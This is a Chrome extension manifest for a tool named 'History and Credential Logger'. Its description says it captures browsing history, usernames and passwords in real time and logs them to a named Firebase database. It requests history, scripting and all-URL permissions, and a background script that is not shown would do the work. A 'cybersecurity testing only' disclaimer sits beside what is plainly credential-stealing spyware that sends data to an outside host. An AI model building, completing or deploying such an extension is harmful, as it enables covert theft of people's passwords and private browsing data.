{
  "manifest_version": 3,
  "name": "History and Credential Logger",
  "version": "1.0",
  "description": "Monitors browsing history, usernames, and passwords in real-time, logging to a secure Firebase database. For cybersecurity testing only.",
  "permissions": [
    "history",
    "storage",
    "activeTab",
    "scripting"
  ],
  "host_permissions": [
    "https://check-6c35e-default-rtdb.asia-southeast1.firebasedatabase.app/*",
    "<all_urls>"
  ],
  "background": {
    "service_worker": "background.js"
  },
  "action": {
    "default_title": "History and Credential Logger"
  },
  "icons": {
    "128": "images/icon128.jpg"
  }
}